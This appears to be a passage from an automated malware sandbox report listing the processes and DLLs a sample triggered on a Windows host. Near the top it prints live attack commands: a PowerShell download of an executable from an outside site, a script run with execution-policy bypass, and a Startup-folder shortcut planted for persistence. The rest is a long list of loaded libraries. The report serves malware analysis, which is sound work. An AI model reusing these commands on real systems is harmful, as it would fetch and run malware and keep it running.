Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"

Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: imgutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
